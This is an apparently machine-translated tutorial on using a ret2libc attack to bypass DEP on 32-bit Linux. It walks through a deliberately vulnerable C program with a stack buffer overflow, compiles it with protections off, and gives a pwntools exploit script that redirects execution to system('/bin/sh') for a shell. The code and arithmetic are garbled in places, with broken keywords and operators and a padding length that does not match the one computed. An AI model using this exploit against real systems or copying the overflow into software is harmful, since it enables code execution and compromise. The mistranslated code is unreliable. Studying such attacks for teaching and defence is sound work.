Use RET2LIBC to bypass Dep⑴ under Linux. Principle Analysis:
System library functions are usually protected from DEP (about DEP, which can be viewed in more detail in my previous article), so you can bypass DEP protection by pointing the return address to the system function, so you can get the shell by investigating the system function systems ().
⑵. Environment Preparation:
I Vulnerability Code:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
void Flow () {
Char buf[128];
Read (stdin_fileno,buf,256);
}
int main () {
Flow ();
Char a[]= "Hello";
Write (Stdout_fileno,a,strlen (a));
return 0;
}
Compile Instructions:
Gcc-fno-stack-protector-g-m32-o Vuln vuln.c
ii Test environment:
Test system: KAII 2.0 Rolling
Auxiliary plugins: Peda
⑶. Test Analysis:
I function with vulnerability flow return address:
Vulnerability function return address: 0XFFFFD2AC.
ii Buffer Start Address:
Buffer Start Address: 0xffffd220
Iii. system function systems () address
iv System parameter: "/bin/sh"
V. System function Source code:
int system (const char * cmdstring)
{
pid_t pid;
int status;
if (cmdstring = = NULL) {
return (1);
}
if (PID = fork ()) <0) {
status =-1;
}
else if (PID = = 0) {
Execl ("/bin/sh", "sh", "-C", Cmdstring, (char *) 0);
_exit (127); This statement is not executed if the child process is performing normally
}
else{
while (Waitpid (PID, &status, 0) < 0) {
if (errno! = einter) {
status =-1;
Break
}
}
}
return status;
}
⑷. Attack Process:
I Calculate Attack shellcode Length:
Our goal is to overwrite the return address with the address of the system function, overwriting the address of the "/bin/sh" that we found with the parameter address after the system function (the following 8 bytes, and the four bytes is the return address).
So size (shellcode) = Address (ret)-Address (buff) + = 0xffffd2ac–0xffffd220 + 12 = 152
II. Design SHELLCODE Structure:
Note: addr (Ret:system) can be an arbitrary address because the shell is not returned after we have hijacked the program.
iii Write the exploit script:
From PWN Import *
SH = 0xf7f4a808
system = 0xf7e0bc70
RET = 0x565555d4
Payload = ' A ' *140+p32 (System) +P32 (ret) +P32 (SH)
p = Process ('./vuln ')
P.send (payload)
P.interactive ()
Perform:
Success.
Using RET2LIBC to bypass DEP under Linux